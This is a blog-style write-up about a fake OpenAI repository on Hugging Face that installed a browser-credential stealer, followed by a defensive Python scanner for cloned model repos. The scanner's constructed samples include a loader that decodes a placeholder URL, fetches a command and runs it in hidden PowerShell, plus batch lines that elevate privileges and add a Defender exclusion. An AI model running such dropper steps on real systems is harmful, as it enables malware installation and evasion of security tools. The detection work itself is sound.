A malicious actor created a fake OpenAI repository on Hugging Face that stole browser passwords and cookies from users who ran the code, demonstrating how supply chain attacks exploit trust in legitimate platforms by mimicking official repositories with slightly altered names and copy-pasted documentation.
Deep Dive
Fake OpenAI Repo on Hugging Face Stole Browser Passwords
A fake OpenAI repository spent the last few days at the top of Hugging Face's trending list, and anyone who ran the code walked away with browser passwords and cookies stolen.
Hugging Face is the public hub where machine learning models live. Kind of like the GitHub of AI. On April 22nd, OpenAI released a real model there called Privacy Filter. It's an open-weight tool that detects and redacts personal information from text and runs locally so that data never has to leave your machine. Two weeks later, a brand-new account called Open OSS posted a repository with the same name and a model card copy-pasted nearly verbatim from OpenAI's.
Researchers at HiddenLayer flagged it on May 7th, but by then it had reached number one on the trending list and racked up 244,000 downloads. HiddenLayer notes the count may have been inflated, and most of the 667 accounts that liked the repo appear to be auto-generated.
The repo's install instructions told users to clone it and run an included setup script. On Windows, that was a batch file. On Linux and Mac, it was a script called loader.py. That script disabled SSL verification, decoded a hidden URL, and fetched a PowerShell command that ran in an invisible window.
The command pulled down another batch file, escalated to admin, and dropped the final payload, a Rust-based info stealer called Sapphira, added it to Microsoft Defender's exclusions, and then ran it. Sapphira targets browser data from Chrome, Edge, Firefox, and other major browsers. It grabs things like cookies, saved passwords, and encryption keys. Hugging Face removed the repo after reports came in.
But this is another supply chain story like the PyPI elementary data one I covered a couple of weeks back, except this one uses typosquatting.
This is the kind of attack that catches people new to AI, and those people may not have noticed the odd installation instructions. The standard way to load a Hugging Face model is one line of Python through the transformers library. No git clone, no setup script. Unfortunately, the AI space is full of people who'd love you to copy-paste those steps without thinking. My advice is, before you run anything from a public repo or paste arbitrary commands from a public website, be sure you know what those commands do and what that repo does.
This one had plenty of red flags: a brand-new account, a disabled community tab, and installation instructions that don't match how you normally use that platform.
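A concrete version of the "know what the script does before you run it" advice, as an added example that is not code from the video, HiddenLayer, or Hugging Face: a static triage pass over a cloned model repo that looks for the behaviours described above (a setup script where the model card should show a one-line transformers load, disabled TLS verification, a URL decoded at runtime, a hidden PowerShell launch, an elevation prompt, a Defender exclusion). The regexes are heuristics for those described behaviours, not signatures for the actual malware; every repo name, path, and file body below is a constructed sample (lookalike-org, example-org, example.invalid) and nothing is fetched or executed.

```python
"""Static triage of a cloned Hugging Face model repo for the dropper
behaviours described above. Added example, not code from the video,
HiddenLayer or Hugging Face; regexes are heuristics for the *described*
behaviours, not malware signatures. All names and file bodies are samples."""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    path: str
    rule: str
    line: int      # 0 for findings about a whole file
    evidence: str


# (rule, pattern) applied line by line to every non-model-card text file.
RULES = [
    ("ssl_verification_disabled",
     re.compile(r"verify\s*=\s*False|_create_unverified_context|check_hostname\s*=\s*False")),
    ("encoded_url_decoded_at_runtime",
     re.compile(r"\b(b64decode|a85decode|fromhex)\s*\(|codecs\.decode\s*\(")),
    ("hidden_powershell_launch",
     re.compile(r"powershell(\.exe)?[^\n]*(-w(indowstyle)?\W+hidden|-enc(odedcommand)?\b)", re.I)),
    ("privilege_escalation_prompt", re.compile(r"-Verb\s+RunAs", re.I)),
    ("defender_exclusion_added",
     re.compile(r"Add-MpPreference[^\n]*-Exclusion(Path|Process|Extension)", re.I)),
    ("process_spawn_from_setup",
     re.compile(r"subprocess\.(run|Popen|call|check_call|check_output)\s*\(|os\.system\s*\(")),
]
# Any one of these inside a "setup" step is reason enough to refuse to run it.
EVASION = {"ssl_verification_disabled", "encoded_url_decoded_at_runtime",
           "hidden_powershell_launch", "privilege_escalation_prompt",
           "defender_exclusion_added"}

SETUP_SCRIPT = re.compile(r"(^|/)(setup|install|loader|run)\.(py|bat|cmd|ps1|sh)$", re.I)
# Model card says "clone and run a script" but never shows the one-line
# transformers load: the instruction mismatch the write-up points at.
CLONE_AND_RUN = re.compile(
    r"git\s+clone[\s\S]{0,300}?(python3?\s+\S+\.py|\S+\.(bat|cmd|ps1|sh)\b)", re.I)
STANDARD_LOAD = re.compile(r"from\s+transformers\s+import|\.from_pretrained\s*\(|\bpipeline\s*\(")


def scan_text_file(path, text):
    findings = []
    if SETUP_SCRIPT.search(path):
        findings.append(Finding(path, "setup_script_present", 0, path))
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES:
            if rx.search(line):
                findings.append(Finding(path, rule, lineno, line.strip()[:80]))
    return findings


def scan_model_card(path, text):
    if CLONE_AND_RUN.search(text) and not STANDARD_LOAD.search(text):
        return [Finding(path, "install_instructions_not_transformers", 0,
                        "git clone + run a script; no from_pretrained/pipeline shown")]
    return []


def verdict(findings):
    rules = {f.rule for f in findings}
    if rules & EVASION:
        return "do_not_run"
    if len(rules) >= 2:      # e.g. setup script + non-standard install steps
        return "suspicious"
    return "review" if rules else "clean"


def triage(files):
    """files maps repo-relative path -> text. Returns (verdict, findings)."""
    findings = []
    for path, text in files.items():
        if path.lower() in ("readme.md", "model_card.md"):
            findings += scan_model_card(path, text)
        else:
            findings += scan_text_file(path, text)
    return verdict(findings), findings


# Constructed sample mirroring the described layout; example.invalid never resolves.
SUSPECT_REPO = {
    "README.md": ("# privacy-filter\n## Install\n```\n"
                  "git clone https://huggingface.co/lookalike-org/privacy-filter\n"
                  "cd privacy-filter\npython loader.py\n```\n"),
    "loader.py": ("import base64, ssl, subprocess, urllib.request\n"
                  "ssl._create_default_https_context = ssl._create_unverified_context\n"
                  'url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv").decode()\n'
                  "cmd = urllib.request.urlopen(url).read().decode()\n"
                  'subprocess.run(["powershell", "-WindowStyle", "Hidden", "-Command", cmd])\n'),
    "setup.bat": ("@echo off\n"
                  "powershell -Command \"Start-Process cmd -Verb RunAs -ArgumentList '/c %~f0'\"\n"
                  "powershell -Command \"Add-MpPreference -ExclusionPath %TEMP%\"\n"),
    "config.json": '{"model_type": "bert"}\n',
}
# Constructed sample of what a normal model repo looks like: one-line load, no script.
BENIGN_REPO = {
    "README.md": ("# privacy-filter\n```python\nfrom transformers import pipeline\n"
                  'pii = pipeline("token-classification", model="example-org/privacy-filter")\n```\n'),
    "config.json": '{"model_type": "bert"}\n',
}

if __name__ == "__main__":
    for name, repo in (("suspect", SUSPECT_REPO), ("benign", BENIGN_REPO)):
        result, hits = triage(repo)
        print(f"{name}: {result}")
        for f in hits:
            print(f"  {f.path}:{f.line} {f.rule}: {f.evidence}")
```

Run it over a clone before executing anything in it (read each text file into the dict that `triage` takes). An `install_instructions_not_transformers` or `setup_script_present` hit on its own is a prompt to read the card and the script; any evasion rule hit means the "setup" step is doing something a model loader has no reason to do, so don't run it. The other two red flags from the write-up, a brand-new account and a disabled community tab, are Hub metadata rather than repo contents and are not covered by this file scan.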